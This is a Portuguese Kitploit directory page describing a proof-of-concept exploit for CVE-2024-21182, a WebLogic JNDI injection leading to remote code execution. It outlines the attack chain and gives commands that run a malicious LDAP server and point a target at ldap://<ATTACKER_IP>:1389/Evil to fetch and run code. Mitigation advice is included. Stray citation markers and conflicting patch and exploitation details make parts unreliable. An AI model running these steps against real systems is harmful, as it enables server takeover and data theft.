Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — Exploit de prova de conceito para CVE-2024-21182, uma injeção JNDI não autenticada que leva à execução remota de código no Oracle WebLogic Server através dos protocolos T3/IIOP. Inclui um laboratório Docker para testes. | Kitploit
Ferramentas/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

Exploit de prova de conceito para CVE-2024-21182, uma injeção JNDI não autenticada que leva à execução remota de código no Oracle WebLogic Server através dos protocolos T3/IIOP. Inclui um laboratório Docker para testes.

Ver Repositório
há 2 mesesAinda não revisado

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 CVSS CISA KEV

📋 Descrição

CVE-2024-21182 é uma vulnerabilidade de injeção JNDI não autenticada que afeta o componente Core do Oracle WebLogic Server. Permite que um atacante remoto, através dos protocolos T3 ou IIOP, execute código arbitrário (RCE) no servidor, podendo obter acesso completo a todos os dados do servidor[citation:5][citation:8][citation:9].

Este repositório contém um Proof of Concept (PoC) funcional que demonstra a exploração bem-sucedida do patch de CVE-2023-21839 através da cadeia de gadgets AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].

🚨 Detalhes da Vulnerabilidade

Vetor de Ataque

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Rede (AV:N): Explorável remotamente
  • Baixa complexidade (AC:L): Sem condições especiais
  • Sem autenticação (PR:N): Acesso anônimo
  • Sem interação do usuário (UI:N): Exploração passiva

⚙️ Fases do Ataque

Fase 1: Reconhecimento: Identificar servidores WebLogic com as portas T3/IIOP (7001) expostas.

Fase 2: Análise: Determinar se o servidor executa uma versão vulnerável (12.2.1.4.0 ou 14.1.1.0.0) ou carece do patch de Outubro 2024.

Fase 3: Exploração (fluxo técnico):

  1. Construção do Gadget: O atacante cria um objeto AggregatableOpaqueReference[citation:2].
  2. Injeção de Referência: Por meio de reflexão (Java), modifica-se o campo privado referent do objeto anterior para que aponte para um MessageDestinationReference malicioso[citation:4].
  3. Bind e Lookup: O objeto malicioso é "encadeado" (bind) na árvore JNDI do servidor e então "buscado" (lookup).
  4. Resolução JNDI: Ao buscar o objeto, o servidor executa uma nova consulta JNDI contra a URL controlada pelo atacante (servidor LDAP).
  5. Servidor LDAP: Responde com uma referência a um código Java hospedado no servidor HTTP do atacante.
  6. Execução de Código: O servidor WebLogic baixa e instancia a classe Java, executando seu conteúdo no contexto da máquina vítima.

🛠️ Pré-requisitos

  • Docker e Docker Compose: Para o ambiente de teste isolado[citation:2].
  • JDK 8 ou superior: Para compilar e executar o cliente T3.
  • Cliente T3 do WebLogic: wlthint3client.jar (pode ser extraído de uma instalação do WebLogic).

🚀 Uso do PoC

Ambiente de Laboratório (Docker)

root@kitploit:~
# 1. Clonar o repositório
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. Iniciar o laboratório (vítima + atacante)
docker-compose up -d

# 3. Executar a exploração automática
./validate.sh

Exploração contra um alvo real (autorizado)
bash
# 1. Iniciar o servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py

# 2. Em outro terminal, executar o payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
📊 Impacto Demonstrado
Execução remota de comandos (RCE) no servidor

Acesso não autorizado a dados críticos da aplicação

Comprometimento completo do servidor de aplicações

Potencial porta de entrada para movimento lateral na rede corporativa

Base para implantação de ransomware ou outras cargas maliciosas

Status atual segundo CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Mas tipicamente sim, RCEs em middleware são vetor inicial em intrusões de ransomware).

🛡️ Mitigação
Aplicar patch imediatamente: Aplicar o Critical Patch Update da Oracle de Outubro 2024 ou posterior.

Restrição de rede: Bloquear/limitar o acesso às portas T3/IIOP (ex. 7001) apenas a origens confiáveis.

Monitoramento: Detectar tentativas de bind/lookup incomuns na árvore JNDI.

⚠️ Aviso Legal
Este código é exclusivamente para fins educacionais e de pesquisa. O uso indevido deste PoC contra sistemas sem autorização expressa é ilegal. O autor não se responsabiliza pelo mau uso desta informação.

📚 Referências
NVD - CVE-2024-21182

CISA KEV Catalog

Oracle Security Advisory

Análise técnica original

🤝 Créditos
Pesquisador original que descobriu a cadeia de gadgets

dinosn pelo laboratório reproduzível em Docker
Baixar ferramenta
AtributoValor
CVECVE-2024-21182
ProdutoOracle WebLogic Server (Core)
Versões afetadas12.2.1.4.0 e 14.1.1.0.0[citation:7]
Patch disponívelOracle Critical Patch Update (Julho 2024 e Outubro 2024)[citation:6]
Status no CISA KEVExploração ativa confirmada (adicionada em 01/06/2026)[citation:3][citation:8]
Data limite de mitigação (CISA)04/06/2026[citation:8]